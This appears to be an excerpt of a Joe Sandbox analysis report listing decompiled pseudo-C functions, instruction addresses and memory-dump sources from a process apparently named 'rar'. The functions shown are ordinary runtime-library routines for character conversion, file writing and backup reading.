                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 6264da173e9c138e51aba1541d2a93680faf518496cce12d926b401a3edfea89
                                                                                                            • Instruction ID: b55208a03a761b790ddcfa7313fc6e54f0ae6ba8c34538ace006ad833be42628
                                                                                                            • Opcode Fuzzy Hash: 6264da173e9c138e51aba1541d2a93680faf518496cce12d926b401a3edfea89
                                                                                                            • Instruction Fuzzy Hash: 30F04F25A29A43A1EE888B11E4C43793360AF89BD0F4C1035EA0FA6774DE3DE8888700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7C6F4 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 21%
                                                                                                            			E00007FF67FF650B7C6F4(signed int __ebx, signed int __esi, intOrPtr* __rcx, long long __rdx, intOrPtr* __r9, void* __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t64;
				int _t68;
				intOrPtr _t80;
				intOrPtr _t81;
				signed long long _t151;
				intOrPtr* _t154;
				intOrPtr* _t156;
				signed long long _t157;
				intOrPtr* _t170;
				signed long long _t177;
				signed long long _t178;
				signed long long _t179;
				signed long long _t180;
				void* _t193;
				intOrPtr* _t196;
				signed long long _t201;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t205;
				void* _t212;
				long long _t218;
				intOrPtr* _t220;

				_t217 = __r11;
				_t216 = __r10;
				_t203 = _t202 - 0x88;
				_t201 = _t203 + 0x50;
				_t151 =  *0x50b978f0; // 0x27db226282f1
				_t152 = _t151 ^ _t201;
				 *(_t201 + 0x28) = _t151 ^ _t201;
				r12d = 0;
				_t220 =  *((intOrPtr*)(_t201 + 0xa8));
				 *_t201 = r8d;
				 *((long long*)(_t201 + 8)) = __rdx;
				if (__ebx <= 0) goto 0x50b7c767;
				E00007FF67FF650B7CED4(_t151 ^ _t201, __r9,  *((intOrPtr*)(_t201 + 0xa0)));
				if (__esi <= 0) goto 0x50b7c773;
				E00007FF67FF650B7CED4(_t151 ^ _t201, _t220,  *((intOrPtr*)(_t201 + 0xb0)));
				goto 0x50b7c778;
				if (__ebx - 0xffffffff >= 0) goto 0x50b7c74c;
				goto 0x50b7ca69;
				if (__esi - 0xffffffff < 0) goto 0x50b7c76c;
				r14d =  *((intOrPtr*)(_t201 + 0xb8));
				if (r14d != 0) goto 0x50b7c78b;
				r14d =  *((intOrPtr*)( *__rcx + 0xc));
				if (__ebx == 0) goto 0x50b7c79c;
				if (__esi != 0) goto 0x50b7c837;
				if (__ebx != __esi) goto 0x50b7c7aa;
				goto 0x50b7ca69;
				if (__esi - 1 <= 0) goto 0x50b7c7b5;
				goto 0x50b7ca69;
				if (__ebx - 1 <= 0) goto 0x50b7c7c3;
				goto 0x50b7ca69;
				if (GetCPInfo(??, ??) == 0) goto 0x50b7c76c;
				if (__ebx <= 0) goto 0x50b7c803;
				if ( *((intOrPtr*)(_t201 + 0x10)) - 2 < 0) goto 0x50b7c7b9;
				_t154 = _t201 + 0x16;
				if ( *((intOrPtr*)(_t201 + 0x16)) == r12b) goto 0x50b7c7b9;
				if ( *((intOrPtr*)(_t154 + 1)) == r12b) goto 0x50b7c7b9;
				_t80 =  *__r9;
				if (_t80 -  *_t154 < 0) goto 0x50b7c7fa;
				if (_t80 -  *((intOrPtr*)(_t154 + 1)) <= 0) goto 0x50b7c7a0;
				goto 0x50b7c7e6;
				if (__esi <= 0) goto 0x50b7c837;
				if ( *((intOrPtr*)(_t201 + 0x10)) - 2 < 0) goto 0x50b7c7ae;
				_t156 = _t201 + 0x16;
				if ( *((intOrPtr*)(_t201 + 0x16)) == r12b) goto 0x50b7c7ae;
				if ( *((intOrPtr*)(_t156 + 1)) == r12b) goto 0x50b7c7ae;
				_t81 =  *_t220;
				if (_t81 -  *_t156 < 0) goto 0x50b7c82e;
				if (_t81 -  *((intOrPtr*)(_t156 + 1)) <= 0) goto 0x50b7c7a0;
				_t157 = _t156 + 2;
				goto 0x50b7c815;
				 *(_t203 + 0x28) = r12d;
				r9d = __ebx;
				 *((long long*)(_t203 + 0x20)) = _t218;
				_t64 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t64 == 0) goto 0x50b7c76c;
				_t193 = _t64 + _t64;
				_t22 = _t193 + 0x10; // 0x10
				asm("dec eax");
				if ((_t22 & _t157) == 0) goto 0x50b7c8f1;
				_t25 = _t193 + 0x10; // 0x10
				_t177 = _t25;
				asm("dec eax");
				_t26 = _t193 + 0x10; // 0x10
				if ((_t157 & _t177) - 0x400 > 0) goto 0x50b7c8cf;
				asm("dec eax");
				_t178 = _t177 & _t26;
				_t27 = _t178 + 0xf; // 0x1f
				if (_t27 - _t178 > 0) goto 0x50b7c8ad;
				E00007FF67FF650B69CB0(_t64, 0xffffffffffffff0, __r10, __r11);
				_t204 = _t203 - 0xffffffffffffff0;
				_t196 = _t204 + 0x50;
				if (_t196 == 0) goto 0x50b7ca4f;
				 *_t196 = 0xcccc;
				goto 0x50b7c8eb;
				asm("dec eax");
				_t179 = _t178 & 0xffffffffffffff0;
				E00007FF67FF650B7499C(0xffffffffffffff0, _t179);
				if (0xffffffffffffff0 == 0) goto 0x50b7c8f3;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x50b7c8f3;
				if (0x1000000000000000 == 0) goto 0x50b7ca4f;
				 *(_t204 + 0x28) = r12d;
				r9d = __ebx;
				 *(_t204 + 0x20) = 0x1000000000000000;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x50b7ca4f;
				 *(_t204 + 0x28) =  *(_t204 + 0x28) & 0x00000000;
				r9d = __esi;
				 *(_t204 + 0x20) =  *(_t204 + 0x20) & 0x00000000;
				_t68 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t68 == 0) goto 0x50b7ca4f;
				_t212 = _t68 + _t68;
				asm("dec eax");
				if ((_t212 + 0x00000010 & _t179) == 0) goto 0x50b7c9da;
				_t180 = _t212 + 0x10;
				asm("dec eax");
				if ((0xffffffffffffff0 & _t180) - 0x400 > 0) goto 0x50b7c9b8;
				asm("dec eax");
				if ((_t180 & _t212 + 0x00000010) + 0xf - (_t180 & _t212 + 0x00000010) > 0) goto 0x50b7c996;
				E00007FF67FF650B69CB0(_t68, 0xffffffffffffff0, _t216, _t217);
				_t205 = _t204 - 0xfffffff0;
				_t170 = _t205 + 0x50;
				if (_t170 == 0) goto 0x50b7ca35;
				 *_t170 = 0xcccc;
				goto 0x50b7c9d4;
				asm("dec eax");
				E00007FF67FF650B7499C(0xffffffffffffff0, _t180 & _t212 + 0x00000010 & 0xfffffff0);
				if (0xfffffff0 == 0) goto 0x50b7c9dc;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0x50b7c9dc;
				if (0xfffffff0 == 0) goto 0x50b7ca35;
				 *((intOrPtr*)(_t205 + 0x28)) = r15d;
				r9d = __esi;
				 *((long long*)(_t205 + 0x20)) = 0xfffffff0;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) == 0) goto 0x50b7ca35;
				 *(_t205 + 0x40) =  *(_t205 + 0x40) & 0x00000000;
				r9d = r12d;
				 *(_t205 + 0x38) =  *(_t205 + 0x38) & 0x00000000;
				 *(_t205 + 0x30) =  *(_t205 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t205 + 0x28)) = r15d;
				 *((long long*)(_t205 + 0x20)) = 0xfffffff0;
				E00007FF67FF650B76B84( *_t201, MultiByteToWideChar(??, ??, ??, ??, ??, ??), 0x1000000000000000,  *((intOrPtr*)(_t201 + 8)), 0x1000000000000000, _t152, _t201, 0x1000000000000000);
				goto 0x50b7ca37;
				if (0x1000000000000000 == 0) goto 0x50b7ca51;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x50b7ca51;
				E00007FF67FF650B7495C(0xffffffffffffff0, 0xffffffffffffff0);
				goto 0x50b7ca51;
				if (0x1000000000000000 == 0) goto 0x50b7ca67;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x50b7ca67;
				E00007FF67FF650B7495C(0xffffffffffffff0, 0xffffffffffffff0);
				return E00007FF67FF650B69D10(0, r14d,  *(_t201 + 0x28) ^ _t201);
			}






























                                                                                                            0x7ff650b7c6f4
                                                                                                            0x7ff650b7c6f4
                                                                                                            0x7ff650b7c701
                                                                                                            0x7ff650b7c708
                                                                                                            0x7ff650b7c70d
                                                                                                            0x7ff650b7c714
                                                                                                            0x7ff650b7c717
                                                                                                            0x7ff650b7c722
                                                                                                            0x7ff650b7c725
                                                                                                            0x7ff650b7c72f
                                                                                                            0x7ff650b7c736
                                                                                                            0x7ff650b7c73c
                                                                                                            0x7ff650b7c744
                                                                                                            0x7ff650b7c755
                                                                                                            0x7ff650b7c75d
                                                                                                            0x7ff650b7c765
                                                                                                            0x7ff650b7c76a
                                                                                                            0x7ff650b7c76e
                                                                                                            0x7ff650b7c776
                                                                                                            0x7ff650b7c778
                                                                                                            0x7ff650b7c782
                                                                                                            0x7ff650b7c787
                                                                                                            0x7ff650b7c792
                                                                                                            0x7ff650b7c796
                                                                                                            0x7ff650b7c79e
                                                                                                            0x7ff650b7c7a5
                                                                                                            0x7ff650b7c7ac
                                                                                                            0x7ff650b7c7b0
                                                                                                            0x7ff650b7c7b7
                                                                                                            0x7ff650b7c7be
                                                                                                            0x7ff650b7c7d2
                                                                                                            0x7ff650b7c7d6
                                                                                                            0x7ff650b7c7dc
                                                                                                            0x7ff650b7c7e2
                                                                                                            0x7ff650b7c7e6
                                                                                                            0x7ff650b7c7ec
                                                                                                            0x7ff650b7c7ee
                                                                                                            0x7ff650b7c7f3
                                                                                                            0x7ff650b7c7f8
                                                                                                            0x7ff650b7c801
                                                                                                            0x7ff650b7c805
                                                                                                            0x7ff650b7c80b
                                                                                                            0x7ff650b7c811
                                                                                                            0x7ff650b7c815
                                                                                                            0x7ff650b7c81b
                                                                                                            0x7ff650b7c81d
                                                                                                            0x7ff650b7c823
                                                                                                            0x7ff650b7c828
                                                                                                            0x7ff650b7c82e
                                                                                                            0x7ff650b7c835
                                                                                                            0x7ff650b7c837
                                                                                                            0x7ff650b7c83c
                                                                                                            0x7ff650b7c842
                                                                                                            0x7ff650b7c84f
                                                                                                            0x7ff650b7c85a
                                                                                                            0x7ff650b7c86d
                                                                                                            0x7ff650b7c870
                                                                                                            0x7ff650b7c877
                                                                                                            0x7ff650b7c87d
                                                                                                            0x7ff650b7c87f
                                                                                                            0x7ff650b7c87f
                                                                                                            0x7ff650b7c886
                                                                                                            0x7ff650b7c892
                                                                                                            0x7ff650b7c896
                                                                                                            0x7ff650b7c89b
                                                                                                            0x7ff650b7c89e
                                                                                                            0x7ff650b7c8a1
                                                                                                            0x7ff650b7c8a8
                                                                                                            0x7ff650b7c8b1
                                                                                                            0x7ff650b7c8b6
                                                                                                            0x7ff650b7c8b9
                                                                                                            0x7ff650b7c8c1
                                                                                                            0x7ff650b7c8c7
                                                                                                            0x7ff650b7c8cd
                                                                                                            0x7ff650b7c8d2
                                                                                                            0x7ff650b7c8d5
                                                                                                            0x7ff650b7c8d8
                                                                                                            0x7ff650b7c8e3
                                                                                                            0x7ff650b7c8e5
                                                                                                            0x7ff650b7c8ef
                                                                                                            0x7ff650b7c8f6
                                                                                                            0x7ff650b7c8fc
                                                                                                            0x7ff650b7c901
                                                                                                            0x7ff650b7c907
                                                                                                            0x7ff650b7c91c
                                                                                                            0x7ff650b7c922
                                                                                                            0x7ff650b7c927
                                                                                                            0x7ff650b7c92a
                                                                                                            0x7ff650b7c93b
                                                                                                            0x7ff650b7c946
                                                                                                            0x7ff650b7c94f
                                                                                                            0x7ff650b7c959
                                                                                                            0x7ff650b7c95f
                                                                                                            0x7ff650b7c961
                                                                                                            0x7ff650b7c968
                                                                                                            0x7ff650b7c978
                                                                                                            0x7ff650b7c97d
                                                                                                            0x7ff650b7c98a
                                                                                                            0x7ff650b7c99a
                                                                                                            0x7ff650b7c99f
                                                                                                            0x7ff650b7c9a2
                                                                                                            0x7ff650b7c9aa
                                                                                                            0x7ff650b7c9b0
                                                                                                            0x7ff650b7c9b6
                                                                                                            0x7ff650b7c9bb
                                                                                                            0x7ff650b7c9c1
                                                                                                            0x7ff650b7c9cc
                                                                                                            0x7ff650b7c9ce
                                                                                                            0x7ff650b7c9d8
                                                                                                            0x7ff650b7c9df
                                                                                                            0x7ff650b7c9e1
                                                                                                            0x7ff650b7c9e6
                                                                                                            0x7ff650b7c9ec
                                                                                                            0x7ff650b7ca01
                                                                                                            0x7ff650b7ca03
                                                                                                            0x7ff650b7ca09
                                                                                                            0x7ff650b7ca0c
                                                                                                            0x7ff650b7ca15
                                                                                                            0x7ff650b7ca22
                                                                                                            0x7ff650b7ca27
                                                                                                            0x7ff650b7ca2c
                                                                                                            0x7ff650b7ca33
                                                                                                            0x7ff650b7ca3a
                                                                                                            0x7ff650b7ca46
                                                                                                            0x7ff650b7ca48
                                                                                                            0x7ff650b7ca4d
                                                                                                            0x7ff650b7ca54
                                                                                                            0x7ff650b7ca60
                                                                                                            0x7ff650b7ca62
                                                                                                            0x7ff650b7ca85

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ba9968c9865b9575239ccb744408b636bd5502ab4c9e1c673844b6194f138f3
                                                                                                            • Instruction ID: 3885f791250b665ae7ae743b6bf34d857153df9b62b3bea0e04faeb3ce9ccc45
                                                                                                            • Opcode Fuzzy Hash: 1ba9968c9865b9575239ccb744408b636bd5502ab4c9e1c673844b6194f138f3
                                                                                                            • Instruction Fuzzy Hash: D6A1F462B0878366FB658F6094903B96791AF02BA4F4C463DDA5FA67C5DF3EE8448700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B77B5C Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E00007FF67FF650B77B5C(signed long long __ecx, void* __edx, void* __esi, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, void* __r10, void* __r11, long long _a32) {
				char _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rbp;
				void* _t75;
				long _t94;
				unsigned int _t95;
				intOrPtr _t103;
				signed int _t124;
				intOrPtr _t157;
				unsigned long long _t163;
				signed int* _t165;
				intOrPtr _t168;
				signed short* _t178;
				unsigned int _t181;
				signed short* _t182;
				void* _t184;
				void* _t191;
				signed long long _t195;
				void* _t196;
				signed long long _t198;
				signed long long _t199;
				signed long long _t201;
				void* _t202;
				signed short* _t203;

				_t191 = __r9;
				_t178 = __rdx;
				_t166 = __rbx;
				_a32 = __rbx;
				r15d = r8d;
				_t195 = __ecx;
				_t182 = __rdx;
				if (r8d != 0) goto 0x50b77b8a;
				goto 0x50b77e25;
				if (__rdx != 0) goto 0x50b77bae;
				E00007FF67FF650B74D8C(__rax);
				 *__rax = 0;
				_t75 = E00007FF67FF650B74DAC(__rax);
				 *__rax = 0x16;
				E00007FF67FF650B74C8C(_t75);
				goto 0x50b77e25;
				r14d = r14d & 0x0000003f;
				_t198 = _t195 >> 6;
				_t201 = _t195 << 6;
				_v72 = _t198;
				_t168 =  *((intOrPtr*)(0x50bb3c40 + _t198 * 8));
				_t103 =  *((intOrPtr*)(_t168 + _t201 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x50b77be4;
				if (( !r15d & 0x00000001) == 0) goto 0x50b77b8f;
				if (( *(_t168 + _t201 + 0x38) & 0x00000020) == 0) goto 0x50b77bfa;
				_t14 = _t178 + 2; // 0x2
				r8d = _t14;
				E00007FF67FF650B7CCA0(r12d);
				_v88 = _t181;
				if (E00007FF67FF650B7C424(r12d, 0, 0x50bb3c40) == 0) goto 0x50b77d0f;
				_t157 =  *((intOrPtr*)(0x50bb3c40 + _t198 * 8));
				if (( *(0x50bb3c40 + _t201 + 0x38) & 0x00000080) == 0) goto 0x50b77d0f;
				E00007FF67FF650B75660(_t157, __rbx, _t168, _t191);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x90)) + 0x138)) != _t181) goto 0x50b77c50;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x50bb3c40 + _t198 * 8)) + _t201 + 0x39)) == dil) goto 0x50b77d0f;
				if (GetConsoleMode(??, ??) == 0) goto 0x50b77d0f;
				if (_t103 == 0) goto 0x50b77cf1;
				if (_t103 - 1 - 1 > 0) goto 0x50b77dac;
				_v104 = _v104 & 0;
				_t196 = _t182 + _t202;
				_t203 = _t182;
				_v100 = 0;
				if (_t182 - _t196 >= 0) goto 0x50b77da2;
				r13d =  *_t203 & 0x0000ffff;
				if (E00007FF67FF650B7CCA8(r13w & 0xffffffff) != r13w) goto 0x50b77cdf;
				_v100 = 2;
				if (r13w != 0xa) goto 0x50b77cd4;
				r13d = 0xd;
				if (E00007FF67FF650B7CCA8(r13d) != r13w) goto 0x50b77cdf;
				_v100 = 2;
				if ( &(_t203[1]) - _t196 >= 0) goto 0x50b77ce8;
				goto 0x50b77c99;
				_v104 = GetLastError();
				_t199 = _v72;
				goto 0x50b77da2;
				r9d = r15d;
				E00007FF67FF650B774D0(r12d, 1, __esi, _t166,  &_v104,  &_v64, _t182, _t191);
				asm("movsd xmm0, [eax]");
				_t124 =  *0x7FF650BB3C48;
				goto 0x50b77da7;
				if (( *( *((intOrPtr*)(0x50bb3c40 + _t199 * 8)) + _t201 + 0x38) & 0x00000080) == 0) goto 0x50b77d6f;
				if (3 == 0) goto 0x50b77d5b;
				if (3 == 0) goto 0x50b77d47;
				if (2 != 1) goto 0x50b77dac;
				r9d = r15d;
				E00007FF67FF650B777E0(3, r12d, 0x50bb3c40, _t166,  &_v104, _t184, _t182, __r10, __r11);
				goto 0x50b77d03;
				r9d = r15d;
				E00007FF67FF650B778FC(r12d, _t124, 0x50bb3c40, _t166,  &_v104, _t184, _t182, __r10, __r11);
				goto 0x50b77d03;
				r9d = r15d;
				E00007FF67FF650B776D8(2, r12d, _t124, 0x50bb3c40, _t166,  &_v104, _t184, _t182, __r10, __r11);
				goto 0x50b77d03;
				_v104 = _v104 & _t124;
				_v120 = _v120 & 0x50bb3c40;
				r8d = r15d;
				_v100 = 0x50bb3c40;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x50b77d9f;
				_t94 = GetLastError();
				_v104 = _t94;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t163 = _v88 >> 0x20;
				if (_t94 != 0) goto 0x50b77e20;
				_t95 = _v88;
				if (_t95 == 0) goto 0x50b77dec;
				if (_t95 != 5) goto 0x50b77ddf;
				E00007FF67FF650B74DAC(_t163);
				 *_t163 = 9;
				E00007FF67FF650B74D8C(_t163);
				 *_t163 = 5;
				goto 0x50b77ba6;
				E00007FF67FF650B74D3C(_v88, _t163, _t166);
				goto 0x50b77ba6;
				_t165 =  *((intOrPtr*)(0x50bb3c40 + _t199 * 8));
				if (( *(0x50bb3c40 + _t201 + 0x38) & 0x00000040) == 0) goto 0x50b77e08;
				if ( *_t182 == 0x1a) goto 0x50b77b83;
				E00007FF67FF650B74DAC(_t165);
				 *0x50bb3c40 = 0x1c;
				E00007FF67FF650B74D8C(_t165);
				 *_t165 =  *_t165 & 0x00000000;
				goto 0x50b77ba6;
				return _v84 - _v96;
			}

































                                                                                                            0x7ff650b77b5c
                                                                                                            0x7ff650b77b5c
                                                                                                            0x7ff650b77b5c
                                                                                                            0x7ff650b77b5c
                                                                                                            0x7ff650b77b75
                                                                                                            0x7ff650b77b78
                                                                                                            0x7ff650b77b7b
                                                                                                            0x7ff650b77b81
                                                                                                            0x7ff650b77b85
                                                                                                            0x7ff650b77b8d
                                                                                                            0x7ff650b77b8f
                                                                                                            0x7ff650b77b94
                                                                                                            0x7ff650b77b96
                                                                                                            0x7ff650b77b9b
                                                                                                            0x7ff650b77ba1
                                                                                                            0x7ff650b77ba9
                                                                                                            0x7ff650b77bb8
                                                                                                            0x7ff650b77bbf
                                                                                                            0x7ff650b77bc3
                                                                                                            0x7ff650b77bc7
                                                                                                            0x7ff650b77bcb
                                                                                                            0x7ff650b77bcf
                                                                                                            0x7ff650b77bd9
                                                                                                            0x7ff650b77be2
                                                                                                            0x7ff650b77bea
                                                                                                            0x7ff650b77bf1
                                                                                                            0x7ff650b77bf1
                                                                                                            0x7ff650b77bf5
                                                                                                            0x7ff650b77bfd
                                                                                                            0x7ff650b77c08
                                                                                                            0x7ff650b77c15
                                                                                                            0x7ff650b77c1f
                                                                                                            0x7ff650b77c25
                                                                                                            0x7ff650b77c38
                                                                                                            0x7ff650b77c4a
                                                                                                            0x7ff650b77c6c
                                                                                                            0x7ff650b77c74
                                                                                                            0x7ff650b77c7b
                                                                                                            0x7ff650b77c81
                                                                                                            0x7ff650b77c84
                                                                                                            0x7ff650b77c8a
                                                                                                            0x7ff650b77c8d
                                                                                                            0x7ff650b77c93
                                                                                                            0x7ff650b77c99
                                                                                                            0x7ff650b77caa
                                                                                                            0x7ff650b77caf
                                                                                                            0x7ff650b77cb7
                                                                                                            0x7ff650b77cb9
                                                                                                            0x7ff650b77ccb
                                                                                                            0x7ff650b77ccf
                                                                                                            0x7ff650b77cdb
                                                                                                            0x7ff650b77cdd
                                                                                                            0x7ff650b77ce5
                                                                                                            0x7ff650b77ce8
                                                                                                            0x7ff650b77cec
                                                                                                            0x7ff650b77cf1
                                                                                                            0x7ff650b77cfe
                                                                                                            0x7ff650b77d03
                                                                                                            0x7ff650b77d07
                                                                                                            0x7ff650b77d0a
                                                                                                            0x7ff650b77d20
                                                                                                            0x7ff650b77d27
                                                                                                            0x7ff650b77d2c
                                                                                                            0x7ff650b77d31
                                                                                                            0x7ff650b77d33
                                                                                                            0x7ff650b77d40
                                                                                                            0x7ff650b77d45
                                                                                                            0x7ff650b77d47
                                                                                                            0x7ff650b77d54
                                                                                                            0x7ff650b77d59
                                                                                                            0x7ff650b77d5b
                                                                                                            0x7ff650b77d68
                                                                                                            0x7ff650b77d6d
                                                                                                            0x7ff650b77d78
                                                                                                            0x7ff650b77d7d
                                                                                                            0x7ff650b77d82
                                                                                                            0x7ff650b77d88
                                                                                                            0x7ff650b77d94
                                                                                                            0x7ff650b77d96
                                                                                                            0x7ff650b77d9c
                                                                                                            0x7ff650b77da2
                                                                                                            0x7ff650b77da7
                                                                                                            0x7ff650b77db0
                                                                                                            0x7ff650b77db6
                                                                                                            0x7ff650b77db8
                                                                                                            0x7ff650b77dbd
                                                                                                            0x7ff650b77dc2
                                                                                                            0x7ff650b77dc4
                                                                                                            0x7ff650b77dc9
                                                                                                            0x7ff650b77dcf
                                                                                                            0x7ff650b77dd4
                                                                                                            0x7ff650b77dda
                                                                                                            0x7ff650b77de2
                                                                                                            0x7ff650b77de7
                                                                                                            0x7ff650b77df3
                                                                                                            0x7ff650b77dfd
                                                                                                            0x7ff650b77e02
                                                                                                            0x7ff650b77e08
                                                                                                            0x7ff650b77e0d
                                                                                                            0x7ff650b77e13
                                                                                                            0x7ff650b77e18
                                                                                                            0x7ff650b77e1b
                                                                                                            0x7ff650b77e3c

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 3215553584-0
                                                                                                            • Opcode ID: 1c78888a9a9fd0b7b6dd31a399b24e3c1df5ce41ce59047b85c9bc10b164424b
                                                                                                            • Instruction ID: 0e2722de285f79210300e6f8f0707795f96ff168441259d72f1f344830ad65bb
                                                                                                            • Opcode Fuzzy Hash: 1c78888a9a9fd0b7b6dd31a399b24e3c1df5ce41ce59047b85c9bc10b164424b
                                                                                                            • Instruction Fuzzy Hash: 7281CE62A58613A6F7619B659AC06BD27A4FF46B98F084135CD0FB3795DF3EE841C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2E350 Relevance: 7.6, APIs: 5, Instructions: 148COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 35%
                                                                                                            			E00007FF67FF650B2E350(void* __ecx, void* __edi, void* __rax, long long __rbx, long long* __rcx, long long __rdx) {
				void* _t55;
				intOrPtr _t58;
				signed int _t62;
				signed long long _t105;
				signed long long _t106;
				intOrPtr _t108;
				intOrPtr* _t109;
				int _t129;
				void* _t132;
				int _t135;
				intOrPtr _t137;
				LPVOID* _t139;
				void* _t142;
				signed long long _t143;
				void* _t145;
				void* _t151;
				void* _t152;
				DWORD* _t153;
				long _t155;
				BYTE* _t157;
				void* _t160;
				long long _t161;

				 *((long long*)(_t142 + 0x18)) = __rbx;
				_t55 = E00007FF67FF650B69CB0(0x2070, __rax, _t151, _t152);
				_t143 = _t142 - __rax;
				_t105 =  *0x50b978f0; // 0x27db226282f1
				_t106 = _t105 ^ _t143;
				 *(_t142 - 0x1f70 + 0x1f60) = _t106;
				 *((long long*)(_t143 + 0x50)) = __rdx;
				r8d = 0x250;
				E00007FF67FF650B6C1A0(_t55, 0, __rdx, __rdx, _t145);
				if ( *__rcx == 0xffffffff) goto 0x50b2e585;
				_t161 = __rcx + 8;
				r13d = 0;
				 *((long long*)(_t143 + 0x30)) = _t161;
				 *((intOrPtr*)(_t143 + 0x28)) = 1;
				r8d = 0x14;
				 *((intOrPtr*)(_t143 + 0x20)) = r13d;
				if (BackupRead(_t160, _t157, _t155, _t153, _t129, _t135, _t139) == 0) goto 0x50b2e585;
				if ( *((intOrPtr*)(_t143 + 0x40)) - r13d <= 0) goto 0x50b2e585;
				_t58 =  *((intOrPtr*)(_t143 + 0x70));
				if (_t58 == 0) goto 0x50b2e44b;
				if (_t58 - 0xfea >= 0) goto 0x50b2e585;
				 *((long long*)(_t143 + 0x30)) = _t161;
				 *((intOrPtr*)(_t143 + 0x28)) = 1;
				r8d = _t58;
				 *((intOrPtr*)(_t143 + 0x20)) = r13d;
				if (BackupRead(??, ??, ??, ??, ??, ??, ??) == 0) goto 0x50b2e585;
				 *((intOrPtr*)(_t143 + _t106 + 0x74)) = r13w;
				if ( *((intOrPtr*)(_t143 + 0x40)) !=  *((intOrPtr*)(_t143 + 0x70))) goto 0x50b2e585;
